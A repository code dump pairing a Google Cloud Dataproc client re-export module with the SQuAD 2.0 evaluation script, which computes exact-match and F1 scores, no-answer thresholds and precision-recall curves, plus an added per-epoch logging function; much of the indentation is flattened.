# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from google.cloud.dataproc_v1 import ClusterControllerClient
from google.cloud.dataproc_v1 import JobControllerClient
from google.cloud.dataproc_v1 import WorkflowTemplateServiceClient
from google.cloud.dataproc_v1 import enums
from google.cloud.dataproc_v1 import types
__all__ = (
"enums",
"types",
"ClusterControllerClient",
"JobControllerClient",
"WorkflowTemplateServiceClient",
)
|
#*#*#*./examples/evaluate.py
"""Official evaluation script for SQuAD version 2.0.
In addition to basic functionality, we also compute additional statistics and
plot precision-recall curves if an additional na_prob.json file is provided.
This file is expected to map question IDs to the model's predicted probability
that a question is unanswerable.
"""
import argparse
import collections
import json
import numpy as np
import os
import re
import string
import sys
OPTS = None
def parse_args():
parser = argparse.ArgumentParser('Official evaluation script for SQuAD version 2.0.')
parser.add_argument('data_file', metavar='data.json', help='Input data JSON file.')
parser.add_argument('pred_file', metavar='pred.json', help='Model predictions.')
parser.add_argument('--out-file', '-o', metavar='eval.json',
help='Write accuracy metrics to file (default is stdout).')
parser.add_argument('--na-prob-file', '-n', metavar='na_prob.json',
help='Model estimates of probability of no answer.')
parser.add_argument('--na-prob-thresh', '-t', type=float, default=1.0,
help='Predict "" if no-answer probability exceeds this (default = 1.0).')
parser.add_argument('--out-image-dir', '-p', metavar='out_images', default=None,
help='Save precision-recall curves to directory.')
parser.add_argument('--verbose', '-v', action='store_true')
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
return parser.parse_args()
def make_qid_to_has_ans(dataset):
qid_to_has_ans = {}
for article in dataset:
for p in article['paragraphs']:
for qa in p['qas']:
qid_to_has_ans[qa['id']] = bool(qa['answers'])
return qid_to_has_ans
def normalize_answer(s):
"""Lower text and remove punctuation, articles and extra whitespace."""
def remove_articles(text):
regex = re.compile(r'\b(a|an|the)\b', re.UNICODE)
return re.sub(regex, ' ', text)
def white_space_fix(text):
return ' '.join(text.split())
def remove_punc(text):
exclude = set(string.punctuation)
return ''.join(ch for ch in text if ch not in exclude)
def lower(text):
return text.lower()
return white_space_fix(remove_articles(remove_punc(lower(s))))
def get_tokens(s):
if not s: return []
return normalize_answer(s).split()
def compute_exact(a_gold, a_pred):
return int(normalize_answer(a_gold) == normalize_answer(a_pred))
def compute_f1(a_gold, a_pred):
    gold_toks = get_tokens(a_gold)  # gold answer tokens
    pred_toks = get_tokens(a_pred)  # predicted answer tokens
    # multiset intersection, e.g. Counter([1, 2, 33]) & Counter([2, 3, 4]) == Counter({2: 1})
    common = collections.Counter(gold_toks) & collections.Counter(pred_toks)
    num_same = sum(common.values())  # total number of shared tokens
    if len(gold_toks) == 0 or len(pred_toks) == 0:  # compare directly for unanswerable questions
        # If either is no-answer, then F1 is 1 if they agree, 0 otherwise
        return int(gold_toks == pred_toks)
    if num_same == 0:
        return 0
    precision = 1.0 * num_same / len(pred_toks)
    recall = 1.0 * num_same / len(gold_toks)
    f1 = (2 * precision * recall) / (precision + recall)
    return f1
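# Worked example (illustrative): gold "the cat sat" vs. prediction "cat sat down"
# normalise to ["cat", "sat"] and ["cat", "sat", "down"], so num_same = 2,
# precision = 2/3, recall = 1.0 and F1 = 0.8.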
def get_raw_scores(dataset, preds):
exact_scores = {}
f1_scores = {}
for article in dataset:
for p in article['paragraphs']:
for qa in p['qas']:
qid = qa['id']
gold_answers = [a['text'] for a in qa['answers']
if normalize_answer(a['text'])]
if not gold_answers:
# For unanswerable questions, only correct answer is empty string
gold_answers = ['']
if qid not in preds:
print('Missing prediction for %s' % qid)
continue
a_pred = preds[qid]
# Take max over all gold answers
exact_scores[qid] = max(compute_exact(a, a_pred) for a in gold_answers)
f1_scores[qid] = max(compute_f1(a, a_pred) for a in gold_answers)
return exact_scores, f1_scores
def apply_no_ans_threshold(scores, na_probs, qid_to_has_ans, na_prob_thresh):
new_scores = {}
for qid, s in scores.items():
        pred_na = na_probs[qid] > na_prob_thresh  # above the threshold the prediction is treated as "no answer"
if pred_na:
new_scores[qid] = float(not qid_to_has_ans[qid])
else:
new_scores[qid] = s
return new_scores
def make_eval_dict(exact_scores, f1_scores, qid_list=None):
if not qid_list:
total = len(exact_scores)
return collections.OrderedDict([
('exact', 100.0 * sum(exact_scores.values()) / total),
('f1', 100.0 * sum(f1_scores.values()) / total),
('total', total),
])
else:
total = len(qid_list)
return collections.OrderedDict([
('exact', 100.0 * sum(exact_scores[k] for k in qid_list) / total),
('f1', 100.0 * sum(f1_scores[k] for k in qid_list) / total),
('total', total),
])
def merge_eval(main_eval, new_eval, prefix):
for k in new_eval:
main_eval['%s_%s' % (prefix, k)] = new_eval[k]
def plot_pr_curve(precisions, recalls, out_image, title):
plt.step(recalls, precisions, color='b', alpha=0.2, where='post')
plt.fill_between(recalls, precisions, step='post', alpha=0.2, color='b')
plt.xlabel('Recall')
plt.ylabel('Precision')
plt.xlim([0.0, 1.05])
plt.ylim([0.0, 1.05])
plt.title(title)
plt.savefig(out_image)
plt.clf()
def make_precision_recall_eval(scores, na_probs, num_true_pos, qid_to_has_ans,
out_image=None, title=None):
qid_list = sorted(na_probs, key=lambda k: na_probs[k])
true_pos = 0.0
cur_p = 1.0
cur_r = 0.0
precisions = [1.0]
recalls = [0.0]
avg_prec = 0.0
for i, qid in enumerate(qid_list):
if qid_to_has_ans[qid]:
true_pos += scores[qid]
cur_p = true_pos / float(i+1)
cur_r = true_pos / float(num_true_pos)
if i == len(qid_list) - 1 or na_probs[qid] != na_probs[qid_list[i+1]]:
# i.e., if we can put a threshold after this point
avg_prec += cur_p * (cur_r - recalls[-1])
precisions.append(cur_p)
recalls.append(cur_r)
if out_image:
plot_pr_curve(precisions, recalls, out_image, title)
return {'ap': 100.0 * avg_prec}
def run_precision_recall_analysis(main_eval, exact_raw, f1_raw, na_probs,
qid_to_has_ans, out_image_dir):
if out_image_dir and not os.path.exists(out_image_dir):
os.makedirs(out_image_dir)
num_true_pos = sum(1 for v in qid_to_has_ans.values() if v)
if num_true_pos == 0:
return
pr_exact = make_precision_recall_eval(
exact_raw, na_probs, num_true_pos, qid_to_has_ans,
out_image=os.path.join(out_image_dir, 'pr_exact.png'),
title='Precision-Recall curve for Exact Match score')
pr_f1 = make_precision_recall_eval(
f1_raw, na_probs, num_true_pos, qid_to_has_ans,
out_image=os.path.join(out_image_dir, 'pr_f1.png'),
title='Precision-Recall curve for F1 score')
oracle_scores = {k: float(v) for k, v in qid_to_has_ans.items()}
pr_oracle = make_precision_recall_eval(
oracle_scores, na_probs, num_true_pos, qid_to_has_ans,
out_image=os.path.join(out_image_dir, 'pr_oracle.png'),
title='Oracle Precision-Recall curve (binary task of HasAns vs. NoAns)')
merge_eval(main_eval, pr_exact, 'pr_exact')
merge_eval(main_eval, pr_f1, 'pr_f1')
merge_eval(main_eval, pr_oracle, 'pr_oracle')
def histogram_na_prob(na_probs, qid_list, image_dir, name):
if not qid_list:
return
x = [na_probs[k] for k in qid_list]
weights = np.ones_like(x) / float(len(x))
plt.hist(x, weights=weights, bins=20, range=(0.0, 1.0))
plt.xlabel('Model probability of no-answer')
plt.ylabel('Proportion of dataset')
plt.title('Histogram of no-answer probability: %s' % name)
plt.savefig(os.path.join(image_dir, 'na_prob_hist_%s.png' % name))
plt.clf()
def find_best_thresh(preds, scores, na_probs, qid_to_has_ans):
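    # Sweep candidate thresholds in order of increasing no-answer probability.
    # The starting score assumes every prediction is replaced by "" (correct on all
    # unanswerable questions); keeping a prediction gains its score if the question
    # is answerable and loses 1 if a spurious answer was given for an unanswerable one.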
num_no_ans = sum(1 for k in qid_to_has_ans if not qid_to_has_ans[k])
cur_score = num_no_ans
best_score = cur_score
best_thresh = 0.0
    qid_list = sorted(na_probs, key=lambda k: na_probs[k])  # sort qids by no-answer probability, ascending
for i, qid in enumerate(qid_list):
if qid not in scores: continue
if qid_to_has_ans[qid]:
diff = scores[qid]
else:
if preds[qid]:
diff = -1
else:
diff = 0
cur_score += diff
if cur_score > best_score:
best_score = cur_score
best_thresh = na_probs[qid]
return 100.0 * best_score / len(scores), best_thresh
def find_all_best_thresh(main_eval, preds, exact_raw, f1_raw, na_probs, qid_to_has_ans):
best_exact, exact_thresh = find_best_thresh(preds, exact_raw, na_probs, qid_to_has_ans)
best_f1, f1_thresh = find_best_thresh(preds, f1_raw, na_probs, qid_to_has_ans)
main_eval['best_exact'] = best_exact
main_eval['best_exact_thresh'] = exact_thresh
main_eval['best_f1'] = best_f1
main_eval['best_f1_thresh'] = f1_thresh
def main():
with open(OPTS.data_file) as f:
dataset_json = json.load(f)
dataset = dataset_json['data']
with open(OPTS.pred_file) as f:
preds = json.load(f)
if OPTS.na_prob_file:
with open(OPTS.na_prob_file) as f:
na_probs = json.load(f)
else:
na_probs = {k: 0.0 for k in preds}
qid_to_has_ans = make_qid_to_has_ans(dataset) # maps qid to True/False
has_ans_qids = [k for k, v in qid_to_has_ans.items() if v]
no_ans_qids = [k for k, v in qid_to_has_ans.items() if not v]
    exact_raw, f1_raw = get_raw_scores(dataset, preds)  # per-question exact-match and F1 scores
exact_thresh = apply_no_ans_threshold(exact_raw, na_probs, qid_to_has_ans,
OPTS.na_prob_thresh)
f1_thresh = apply_no_ans_threshold(f1_raw, na_probs, qid_to_has_ans,
OPTS.na_prob_thresh)
out_eval = make_eval_dict(exact_thresh, f1_thresh)
if has_ans_qids:
has_ans_eval = make_eval_dict(exact_thresh, f1_thresh, qid_list=has_ans_qids)
merge_eval(out_eval, has_ans_eval, 'HasAns')
if no_ans_qids:
no_ans_eval = make_eval_dict(exact_thresh, f1_thresh, qid_list=no_ans_qids)
merge_eval(out_eval, no_ans_eval, 'NoAns')
if OPTS.na_prob_file:
find_all_best_thresh(out_eval, preds, exact_raw, f1_raw, na_probs, qid_to_has_ans)
if OPTS.na_prob_file and OPTS.out_image_dir:
run_precision_recall_analysis(out_eval, exact_raw, f1_raw, na_probs,
qid_to_has_ans, OPTS.out_image_dir)
histogram_na_prob(na_probs, has_ans_qids, OPTS.out_image_dir, 'hasAns')
histogram_na_prob(na_probs, no_ans_qids, OPTS.out_image_dir, 'noAns')
if OPTS.out_file:
with open(OPTS.out_file, 'w') as f:
json.dump(out_eval, f)
else:
print(json.dumps(out_eval, indent=2))
def judgeOnline(data_file,pred_file,na_prob_file,output_dir,epoch,train_steps):
if not os.path.exists(os.path.join(output_dir,"eval_res")):
os.makedirs(os.path.join(output_dir,"eval_res"))
output = os.path.join(output_dir,"eval_res")
out_file = os.path.join(output,"eval.json")
out_image_dir = None
na_prob_thresh = 1.0
with open(data_file) as f:
dataset_json = json.load(f)
dataset = dataset_json['data']
with open(pred_file) as f:
preds = json.load(f)
with open(na_prob_file) as f:
na_probs = json.load(f)
exact_raw, f1_raw = get_raw_scores(dataset, preds)
    qid_to_has_ans = make_qid_to_has_ans(dataset)  # maps qid to True/False: answerable vs unanswerable in dev
    has_ans_qids = [k for k, v in qid_to_has_ans.items() if v]  # questions that have answers
    no_ans_qids = [k for k, v in qid_to_has_ans.items() if not v]  # questions with no answer
    exact_thresh = apply_no_ans_threshold(exact_raw, na_probs, qid_to_has_ans,
                                          na_prob_thresh)  # no effect here: the default threshold is 1.0
    f1_thresh = apply_no_ans_threshold(f1_raw, na_probs, qid_to_has_ans,
                                       na_prob_thresh)  # no effect here: the default threshold is 1.0
out_eval = make_eval_dict(exact_thresh, f1_thresh)
if has_ans_qids:
has_ans_eval = make_eval_dict(exact_thresh, f1_thresh, qid_list=has_ans_qids)
merge_eval(out_eval, has_ans_eval, 'HasAns')
if no_ans_qids:
no_ans_eval = make_eval_dict(exact_thresh, f1_thresh, qid_list=no_ans_qids)
merge_eval(out_eval, no_ans_eval, 'NoAns')
    if na_prob_file:  # if a null_odds.json file was provided
        find_all_best_thresh(out_eval, preds, exact_raw, f1_raw, na_probs, qid_to_has_ans)  # find the best thresholds
if na_prob_file and out_image_dir:
run_precision_recall_analysis(out_eval, exact_raw, f1_raw, na_probs,
qid_to_has_ans, out_image_dir)
histogram_na_prob(na_probs, has_ans_qids, out_image_dir, 'hasAns')
histogram_na_prob(na_probs, no_ans_qids, out_image_dir, 'noAns')
if out_file:
with open(out_file, 'a') as fout:
fout.write("epoch:{} steps:{} evaluation res:{}\n".format(epoch,train_steps,json.dumps(out_eval, sort_keys=True, indent=2)))
import logging
logger = logging.getLogger(__name__)
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt='%m/%d/%Y %H:%M:%S',
level=logging.INFO )
logger.info("write evaluation result to " + out_file + "OK!")
else:
print(json.dumps(out_eval, indent=2))
return out_eval
if __name__ == '__main__':
OPTS = parse_args()
if OPTS.out_image_dir:
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
print(vars(OPTS))
main()
|